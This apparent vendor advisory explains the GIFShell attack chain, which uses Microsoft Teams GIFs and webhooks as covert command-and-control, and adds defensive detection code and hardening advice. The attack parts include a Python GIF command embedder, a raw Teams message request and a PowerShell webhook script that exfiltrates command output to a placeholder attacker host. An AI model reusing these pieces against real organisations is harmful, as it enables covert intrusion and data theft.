“GIFShell” — Covert Attack Chain and C2 Utilizing Microsoft Teams GIFs

Organizations and security teams work hard to close vulnerabilities in their own systems, yet tend to neglect the risks that come from their SaaS apps. The recently released GIFShell attack method, which leverages Microsoft Teams, is a prime example of how threat actors can exploit legitimate features and configurations that have not been hardened. This piece examines what the method entails and the steps you can take to counter it.


Seven insecure design elements/vulnerabilities in Microsoft Teams can be chained by an attacker to run a reverse shell in which no traffic flows directly between attacker and victim: every exchange is piped through malicious GIFs sent in Teams messages and Out of Bounds (OOB) lookups of those GIFs performed by Microsoft’s own servers. This unusual C2 infrastructure can be used by sophisticated threat actors to evade EDR and other network monitoring tools. In locked-down network environments, where Microsoft Teams may be one of a handful of allowed, trusted hosts and programs, this attack chain can be particularly devastating.

How does it work?

  • To create this reverse shell, an attacker must first compromise a computer to plant the malware, which means convincing the user to install a malicious stager (for example through phishing) that executes commands and uploads command output via a GIF URL to a Microsoft Teams webhook.
  • Once the stager is in place, the threat actor creates their own Microsoft Teams tenant and contacts Microsoft Teams users outside of the organization.
  • The threat actor can then use a GIFShell Python script to send a message to a Microsoft Teams user that contains a specially crafted GIF: a legitimate GIF image modified to include commands to execute on the target's machine.
  • When the target receives the message, the message and the GIF are stored in the Microsoft Teams logs. Important to note: Microsoft Teams runs as a background process, so the user does not even need to open the GIF for the attacker's commands to be received.
  • The stager monitors the Teams logs and, when it finds a GIF, extracts and runs the commands.
  • Microsoft's servers connect back to the attacker's server URL to retrieve the GIF, whose filename is the base64-encoded output of the executed command.
  • The GIFShell server running on the attacker's host receives this request and automatically decodes the data, letting the attacker see the output of the command run on the victim's device.

Insecure Design Elements/Vulnerabilities:

There are seven separate insecure design elements/vulnerabilities that together allow the GIFShell attack chain to occur:

1. When a new tenant is created in Microsoft, Microsoft Teams by default allows all external senders to send messages to users within that tenant. Many organization admins are likely not even aware that their organization allows external Teams collaboration.

2. Microsoft Teams messages are stored in plain text within the low-privileged user’s profile directory, which allows a simple staged payload to continuously scan for new content appended to the logs as Microsoft Teams messages are received.

Microsoft Teams (work or school version) log location:

$HOME\AppData\Roaming\Microsoft\Teams\IndexedDB\https_teams.microsoft.com_0.indexeddb.leveldb\*.log

3. Reading the plain text Teams log files does not require administrator or elevated privileges, which allows the stager to run and scan the log files as the logged-in user.

4. Microsoft Teams attempts to render GIFs included in Microsoft Teams Cards on behalf of the end user. This allows Out of Bounds HTTP and DNS requests to be sent from Microsoft infrastructure as it attempts to fetch GIFs included in Teams Cards. The URL that carries out these lookups on behalf of the user is:

https://urlp.asm.skype.com/v1/url/content?url=<attacker-public-ip>/<exfiltrated-data>.gif

5. The content of base64-encoded GIFs included in Microsoft Teams messages is not scanned for malicious content, nor for bytes that are not actually part of the GIF header or image data.

Here is a Python snippet so you can try embedding malicious commands in a GIF yourself:

import base64

def gif_embedder(gif_path="giphy2.gif", command="whoami;"):
    # Read the legitimate GIF, then append the command text after the image data.
    command_bytes = command.encode()
    with open(gif_path, "rb") as f:
        original = f.read()
    modified = original + command_bytes
    # Teams carries inline images as base64, so emit the modified GIF in that form.
    base64_gif_encoded = base64.b64encode(modified).decode()
    print(base64_gif_encoded)
    return base64_gif_encoded

gif_embedder()
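The check that item 5 says is missing, as an added example that is not code from the article or from the GIFShell tooling: a small parser that walks the GIF block structure (header, logical screen descriptor, colour tables, extension and image blocks) up to the 0x3B trailer and reports any bytes appended after it, which is exactly where the snippet above places its command text. The minimal 1x1 GIF, the `inspect_base64_gif` result fields and the `encode_sample` helper are constructed for this example.

```python
import base64

# Constructed sample: a minimal valid 1x1 GIF89a (35 bytes), built inline so the
# example runs offline. It is not an image from the article.
MINIMAL_GIF = bytes.fromhex(
    "474946383961"                      # "GIF89a" header
    "01000100800000"                    # logical screen descriptor: 1x1, global colour table flag, 2 entries
    "000000ffffff"                      # global colour table: black, white
    "2c00000000010001000002024401003b"  # image descriptor, LZW min code size, data sub-block, terminator, trailer
)

def _skip_sub_blocks(data: bytes, pos: int) -> int:
    """Advance past a chain of length-prefixed data sub-blocks ending in a 0x00 terminator."""
    while True:
        if pos >= len(data):
            raise ValueError("truncated data sub-block chain")
        size = data[pos]
        pos += 1
        if size == 0:
            return pos
        pos += size

def gif_logical_end(data: bytes) -> int:
    """Walk the GIF block structure and return the offset just past the 0x3B trailer."""
    if data[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("not a GIF header")
    if len(data) < 13:
        raise ValueError("truncated logical screen descriptor")
    packed = data[10]
    pos = 13
    if packed & 0x80:                       # global colour table present: 3 bytes per entry
        pos += 3 * (2 ** ((packed & 0x07) + 1))
    while True:
        if pos >= len(data):
            raise ValueError("no trailer found")
        introducer = data[pos]
        pos += 1
        if introducer == 0x3B:              # trailer: logical end of the image
            return pos
        if introducer == 0x21:              # extension: label byte, then sub-blocks
            pos = _skip_sub_blocks(data, pos + 1)
        elif introducer == 0x2C:            # image descriptor: 9 bytes, optional local colour table
            if pos + 9 > len(data):
                raise ValueError("truncated image descriptor")
            img_packed = data[pos + 8]
            pos += 9
            if img_packed & 0x80:
                pos += 3 * (2 ** ((img_packed & 0x07) + 1))
            pos += 1                        # LZW minimum code size
            pos = _skip_sub_blocks(data, pos)
        else:
            raise ValueError(f"unknown block introducer 0x{introducer:02x} at offset {pos - 1}")

def trailing_payload(data: bytes) -> bytes:
    """Bytes appended after the GIF trailer; empty for a clean image."""
    return data[gif_logical_end(data):]

def inspect_base64_gif(b64: str) -> dict:
    """Inspect a GIF as carried in a Teams message body (base64) and report any appended data."""
    data = base64.b64decode(b64)
    extra = trailing_payload(data)
    return {
        "gif_bytes": len(data) - len(extra),
        "trailing_bytes": len(extra),
        "suspicious": bool(extra),
        "trailing_preview": extra[:64],
    }

def encode_sample(extra: bytes = b"") -> str:
    """Constructed helper: the sample GIF with optional appended bytes, base64-encoded."""
    return base64.b64encode(MINIMAL_GIF + extra).decode()

if __name__ == "__main__":
    print(inspect_base64_gif(encode_sample()))
    print(inspect_base64_gif(encode_sample(b"whoami;")))
```

Decoders stop at the trailer, so appended bytes never affect how the image renders; that is why a structural walk, rather than a render test, is needed to notice them. A stricter version would also reject any block introducer other than 0x21, 0x2C and 0x3B, which this parser already treats as an error.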

6. Sending a Microsoft Teams message to an individual is a POST request with a JSON body that has no CSRF protection and no rate limiting. This lets an attacker easily automate the sending of messages with the Python requests module, bypassing any restrictions imposed by the Microsoft Graph API, which is supposed to be the programmatic interface developers use to send Teams messages.

POST /v1/users/ME/conversations/19%3A307c579d-44ea-496c-981e-df92ebfdf9ab_9e02156d-981c-4a84-b2bf-0c5cc1382b8c%40unq.gbl.spaces/messages HTTP/2
Host: amer.ng.msg.teams.microsoft.com
Content-Length: 217
Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="101"
X-Ms-Session-Id: d8a5f3f3-10b5-2413-e7da-302dee811e82
Behavioroverride: redirectAs404
X-Ms-Scenario-Id: 5035
X-Ms-Client-Env: pds-prod-azsc-usea-01
X-Ms-Client-Type: web
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36
Content-Type: application/json
Clientinfo: os=windows; osVer=10; proc=x86; lcid=en-us; deviceType=1; country=us; clientName=skypeteams; clientVer=1415/1.0.0.2022051616; utcOffset=-04:00; timezone=America/New_York
Accept: json
X-Ms-Client-Version: 1415/1.0.0.2022051616
X-Ms-User-Type: null
Authentication: skypetoken=<redacted>
Sec-Ch-Ua-Platform: "macOS"
Origin: https://teams.microsoft.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://teams.microsoft.com/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

{"content":"<p>Test message</p>","messagetype":"RichText/Html","contenttype":"text","amsreferences":[],"clientmessageid":"2298590383200541633","imdisplayname":"Chris Green","properties":{"importance":"","subject":""}}

7. Sending a Microsoft Teams message to a public webhook is a POST request with a JSON body that requires no authentication and has no CSRF or rate-limiting protections. This allows simple data exfiltration from the victim’s machine via Teams Cards embedded with GIFs.

# PowerShell. The GIF URL on the attacker's host carries the base64-encoded command output as its filename.
$gifendpoint = "https://<attacker-site>/<base64-encoded-command-output>.gif"
$json_payload = @"
{
 "@type": "MessageCard",
 "@context": "https://schema.org/extensions",
 "summary": "2 new Yammer posts",
 "themeColor": "0078D7",
 "sections": [
  {
   "activityImage": "$gifendpoint",
   "activityTitle": "Chase Miller",
   "activitySubtitle": "2 hours ago - 3 comments",
   "facts": [
    { "name": "Keywords:", "value": "Surface" },
    { "name": "Group:", "value": "Helpdesk Support" }
   ],
   "text": "Can You Solve the Math Problem That Is Baffling the Internet? More than 530,000 people were commenting on one single Facebook picture. Are you smart enough to figure it out?",
   "potentialAction": [
    { "@type": "OpenUri", "name": "View conversation" }
   ]
  }
 ]
}
"@
# Post the card to the incoming webhook (Invoke-RestMethod is the PowerShell-native equivalent of the curl call).
Invoke-RestMethod -Method Post -Uri '<YOUR WEBHOOK URL>' -ContentType 'application/json' -Body $json_payload
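A defender-side counterpart to item 7, added here and not part of the article: an inspector for MessageCard payloads (for example from a TLS-inspecting proxy or a webhook gateway) that finds image URLs whose host is outside an allowlist or whose filename decodes as base64, which is the shape of the exfiltration the webhook is abused for. The allowlist, the `build_sample_card` helper and the sample command output are constructed for this example.

```python
import base64
import binascii
import json
import re
from urllib.parse import urlparse

# Hosts a card image may legitimately point at. Constructed for this example; an
# organisation would derive its own list from the card sources it actually uses.
ALLOWED_IMAGE_HOSTS = {"statics.teams.cdn.office.net", "media.giphy.com"}
IMAGE_EXTS = (".gif", ".png", ".jpg", ".jpeg")

# Filename stems made only of base64 / base64url characters and long enough to be data rather than a name.
B64_STEM_RE = re.compile(r"^[A-Za-z0-9+/_-]{16,}={0,2}$")

def _iter_urls(node, path="", key=""):
    """Yield (json_path, nearest_key, url) for every http(s) string anywhere in the card."""
    if isinstance(node, dict):
        for k, v in node.items():
            yield from _iter_urls(v, f"{path}.{k}" if path else k, k)
    elif isinstance(node, list):
        for i, v in enumerate(node):
            yield from _iter_urls(v, f"{path}[{i}]", key)
    elif isinstance(node, str) and node.lower().startswith(("http://", "https://")):
        yield path, key, node

def decode_stem(stem: str):
    """Bytes a base64 (or base64url) filename stem decodes to, or None if it is not base64."""
    if not B64_STEM_RE.match(stem):
        return None
    normalised = stem.replace("-", "+").replace("_", "/")
    normalised += "=" * (-len(normalised) % 4)
    try:
        return base64.b64decode(normalised, validate=True)
    except (binascii.Error, ValueError):
        return None

def inspect_card(card: dict, allowed_hosts=ALLOWED_IMAGE_HOSTS) -> list:
    """One finding per image URL that is off-allowlist or carries a base64-looking filename."""
    findings = []
    for field, key, url in _iter_urls(card):
        parsed = urlparse(url)
        is_image = "image" in key.lower() or parsed.path.lower().endswith(IMAGE_EXTS)
        if not is_image:
            continue                      # e.g. the schema.org "@context" URL is not an image fetch
        host = (parsed.hostname or "").lower()
        filename = parsed.path.rsplit("/", 1)[-1]
        stem = filename.rsplit(".", 1)[0]
        decoded = decode_stem(stem)
        host_ok = host in allowed_hosts
        if host_ok and decoded is None:
            continue
        findings.append({"field": field, "url": url, "host": host,
                         "host_allowed": host_ok, "decoded_stem": decoded})
    return findings

def build_sample_card(command_output: bytes, host: str = "attacker.example") -> dict:
    """Constructed MessageCard in the shape shown above, with output smuggled into the image filename."""
    stem = base64.urlsafe_b64encode(command_output).decode().rstrip("=")
    return {
        "@type": "MessageCard",
        "@context": "https://schema.org/extensions",
        "summary": "2 new Yammer posts",
        "sections": [{
            "activityImage": f"https://{host}/{stem}.gif",
            "activityTitle": "Chase Miller",
            "facts": [{"name": "Group:", "value": "Helpdesk Support"}],
        }],
    }

if __name__ == "__main__":
    for f in inspect_card(build_sample_card(b"DESKTOP-01\\alice\r\n")):
        print(json.dumps({**f, "decoded_stem": repr(f["decoded_stem"])}, indent=1))
```

The host check is the stronger signal: hashed filenames on a CDN (32 hex characters, say) are valid base64 and will decode, so an allowlisted host with a decodable stem is worth a look rather than an automatic block. Any image host outside the allowlist is the condition that matters for this attack, since the lookup that fetches it is made by Microsoft's servers on the victim's behalf.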

How to Protect Against the GIFShell Attack

There are security configurations within Microsoft that, if hardened, can help to prevent this type of attack.

  • Disable External Access: Microsoft Teams, by default, allows for all external senders to send messages to users within that tenant. Many organization admins likely are not even aware that their organization allows for External Teams collaboration. You can harden these configurations:


Disable external domain access — Prevent people in your organization from finding, calling, chatting, and setting up meetings with people external to your organization in any domain. While not as seamless of a process as through Teams, this better protects the organization and is worth the extra effort.

Disable unmanaged external teams start conversation — Block Teams users in your organization from communicating with external Teams users whose accounts are not managed by an organization.

  • Gain Device Inventory Insight: You can ensure your entire organization's devices are fully compliant and secure by using your XDR / EDR / Vulnerability Management solution, like Crowdstrike or Tenable. Endpoint security tools are your first line of defense against suspicious activity such as a process accessing the device's local Teams log folder, which GIFShell uses for data exfiltration.

You can even go a step further and integrate an SSPM (SaaS Security Posture Management) solution, like Terraeagle, with your endpoint security tools to gain visibility and context to easily see and manage the risks that stem from these types of configurations, your SaaS users, and their associated devices.
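For the endpoint-detection step above, and for the stager behaviour described under "How does it work?", an added example that is not from the article: a detector that runs over EDR-style file-access events and flags any process other than Teams.exe touching the IndexedDB log files at the path given earlier. The event format, the sample events and the expected-process set are constructed; map the fields to whatever your EDR actually exports.

```python
import json
import re

# Pattern for the Teams (work or school) IndexedDB log files named in the article,
# matched case-insensitively against Windows paths.
TEAMS_LOG_RE = re.compile(
    r"\\AppData\\Roaming\\Microsoft\\Teams\\IndexedDB\\"
    r"https_teams\.microsoft\.com_0\.indexeddb\.leveldb\\[^\\]+\.log$",
    re.IGNORECASE,
)

# Process images expected to open these files. Assumption for this example;
# tune it to what the EDR reports for the Teams install in use.
EXPECTED_IMAGES = {"teams.exe"}

# Constructed EDR-style file-access events, one JSON object per line. Not real telemetry.
SAMPLE_EVENTS = r"""
{"ts":"2022-09-01T13:02:10Z","host":"WS-042","user":"alice","op":"FileRead","image":"C:\\Users\\alice\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe","path":"C:\\Users\\alice\\AppData\\Roaming\\Microsoft\\Teams\\IndexedDB\\https_teams.microsoft.com_0.indexeddb.leveldb\\000005.log"}
{"ts":"2022-09-01T13:02:11Z","host":"WS-042","user":"alice","op":"FileRead","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","path":"C:\\Users\\alice\\AppData\\Roaming\\Microsoft\\Teams\\IndexedDB\\https_teams.microsoft.com_0.indexeddb.leveldb\\000005.log"}
{"ts":"2022-09-01T13:02:12Z","host":"WS-042","user":"alice","op":"FileRead","image":"C:\\Windows\\explorer.exe","path":"C:\\Users\\alice\\Documents\\notes.log"}
{"ts":"2022-09-01T13:02:13Z","host":"WS-042","user":"alice","op":"FileRead","image":"C:\\Users\\alice\\AppData\\Local\\Programs\\Python\\python.exe","path":"C:\\Users\\alice\\AppData\\Roaming\\Microsoft\\Teams\\IndexedDB\\https_teams.microsoft.com_0.indexeddb.leveldb\\000007.log"}
{"ts":"2022-09-01T13:02:14Z","host":"WS-042","user":"alice","op":"FileWrite","image":"C:\\Users\\alice\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe","path":"C:\\Users\\alice\\AppData\\Roaming\\Microsoft\\Teams\\IndexedDB\\https_teams.microsoft.com_0.indexeddb.leveldb\\000007.log"}
"""

def image_name(image_path: str) -> str:
    """Basename of a Windows process image path, lower-cased for comparison."""
    return image_path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def detect_foreign_log_readers(events_text: str, expected=EXPECTED_IMAGES) -> list:
    """One alert per event in which a non-Teams process touches a Teams IndexedDB log file."""
    alerts = []
    for line in events_text.splitlines():
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        if not TEAMS_LOG_RE.search(ev.get("path", "")):
            continue                      # some other file; out of scope for this rule
        proc = image_name(ev.get("image", ""))
        if proc in expected:
            continue                      # Teams itself reading or writing its own store
        alerts.append({
            "ts": ev.get("ts"), "host": ev.get("host"), "user": ev.get("user"),
            "op": ev.get("op"), "process": proc, "image": ev.get("image"), "path": ev.get("path"),
        })
    return alerts

if __name__ == "__main__":
    for a in detect_foreign_log_readers(SAMPLE_EVENTS):
        print(f"{a['ts']} {a['host']} {a['user']} {a['process']} {a['op']} {a['path']}")
```

Because the stager has to poll these files continuously to pick up new commands, the rule also lends itself to a rate condition (many reads of the same .log by one non-Teams process within a short window), which cuts noise from one-off backup or indexing tools that can be added to the expected set instead.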

How to Automate Protection Against These Attacks

There are two methods to combat misconfigurations and harden security settings: manual detection and remediation or an automated SaaS Security Posture Management (SSPM) solution. With the multitudes of configurations, users, devices, and new threats, the manual method is an unsustainable drain on resources, leaving security teams overwhelmed. However, an SSPM solution, such as Terraeagle, enables security teams to gain complete control over their SaaS apps and configurations. Terraeagle automates and streamlines the process of monitoring, detection, and remediation for SaaS misconfigurations, SaaS-to-SaaS access, SaaS-related IAM, and Device-to-SaaS user risk in compliance with both industry and company standards.
